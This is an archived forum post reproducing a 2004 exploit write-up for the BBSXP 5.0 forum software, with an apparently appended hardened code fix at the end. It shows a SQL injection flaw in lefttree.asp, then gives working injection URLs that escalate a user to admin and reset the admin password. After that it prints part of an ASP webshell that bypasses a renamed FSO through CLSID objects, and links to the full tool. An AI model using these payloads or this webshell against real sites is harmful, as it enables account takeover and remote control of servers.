岁月联盟 - Tech Community - BBS.SYUE.COM's Archiver

绝版青春 posted on 2007-1-30 22:40

Shapeshifting with BBSXP 5.0

===========================[ Shapeshifting with BBSXP 5.0 ]==================
Discovered by: xiaolu (web@666w.cn), 13K (13_k@163.com)
Affected versions: BBSXP 5.0 SQL/ACCESS
Date: 2004.5.1 www.666W.COM www.SHJSAFE.COM
==============[ 1. Preface ]============================================

-_-"" Today is May 1st, Labour Day, and I'm so bored... First of all, happy Labour Day, everyone.....

Way too bored... I was spamming on a friend's forum, and he asked me to check his forum's security.....

Fine. I took a look; it's BBSXP 5.0. So I went and downloaded a copy to have a look....

======================================[ 2. Content ]====================

Reading the code..........

(Who would have thought there'd be such a **ing problem. The programmers should do some soul-searching. There's no real technique in this article; I just want to remind programmers not to be so lazy.)



CODE:
lefttree.asp
<!-- #include file="setup.asp" -->
<%

if Request("menu")="menu" then

' Request("id") is concatenated straight into the SQL text: no type check, no parameter
sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof

Heh heh. See that? How incredibly, incredibly lame.........

=======================[ 3. Exploitation ]===================================

OK. Let's go..


CODE:
http://www.host.com/LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username='fuck'--
http://www.host.net/LeftTree.asp?menu=menu&id=1;update clubconfig set adminpassword='A64D84237507262182B4B902A5EDC35B'--


OK.
user:fuck
pass:xiaoxue

"A64D84237507262182B4B902A5EDC35B" is a 32-character MD5 hash.

Into the admin backend.. heh heh. Let's get a webshell up.. yep, upload it.... argh!!!!! FSO has been renamed.. sob sob sob

No fun anymore.. need to find a way around it.... OK. Got it!

Use object, wahaha..... done, done........

Tried it; they didn't change the CLSID. As long as the CLSID hasn't been changed, it'll run... The code is as follows:



CODE:
<%@ LANGUAGE = VBscript.Encode codepage ="936" %>
<%Server.scriptTimeOut=5000%>
<object runat=server id=oscript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oscriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("script_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>

<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>


Omitted......

The full code can be downloaded from:
http://soft.666w.com/tools/gif.rar

Heh.... problem solved, now we can go further.......

=======================[ 4. Closing ]===================================

You can use these to get higher privileges, heh heh.. With the ACCESS version, you can only get the MD5-hashed password..
OK... all done.. back to being bored.... 路子, let's go, the two of us are off to drink away the boredom...... GO GO GO
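The root cause of the advisory above is that LeftTree.asp pastes `Request("id")` straight into the SQL string, so a stacked `;update` statement rides in with the id. As an added example (not BBSXP's own code and not part of the original post), here is how that query can be hardened in classic ASP: accept only a plain integer, then pass it as a typed ADODB parameter so the SQL text never contains user input. It assumes `Conn` is the open ADODB.Connection created by setup.asp, as in the original snippet.

```asp
<!-- #include file="setup.asp" -->
<%
' Hardened replacement for the LeftTree.asp menu query (added example, not BBSXP's own code).
' Assumes setup.asp has opened the ADODB.Connection object "Conn", as the original does.

Function IsPlainInteger(value)
    ' Accepts only 1 to 9 decimal digits. IsNumeric() alone is not enough:
    ' it also accepts forms such as "1e3", "&H1F" or " 1 ", and "1;update ..." must be rejected outright.
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    IsPlainInteger = re.Test(value)
End Function

If Request.QueryString("menu") = "menu" Then
    Dim rawId
    rawId = Trim(Request.QueryString("id"))   ' read the query string only, not Form/Cookies as Request() does
    If Not IsPlainInteger(rawId) Then
        Response.Status = "400 Bad Request"
        Response.Write "Invalid id"
        Response.End
    End If

    ' Parameterised query: the value is bound as an adInteger parameter, never spliced into the SQL text.
    Dim cmd, rs1
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = Conn
    cmd.CommandType = 1                                   ' adCmdText
    cmd.CommandText = "SELECT * FROM menu WHERE followid = ? ORDER BY SortNum"
    cmd.Parameters.Append cmd.CreateParameter("followid", 3, 1, 4, CLng(rawId))   ' 3 = adInteger, 1 = adParamInput
    Set rs1 = cmd.Execute

    Do While Not rs1.EOF
        ' Render rows as the original loop did; HTMLEncode keeps stored values from becoming markup.
        Response.Write Server.HTMLEncode(rs1("SortNum") & "") & "<br>"
        rs1.MoveNext
    Loop
    rs1.Close
    Set rs1 = Nothing
    Set cmd = Nothing
End If
%>
```

Both the SQL Server and the Access (Jet OLEDB) builds accept `?` parameter markers through ADODB.Command, so the same page serves either edition mentioned in the advisory.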


Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.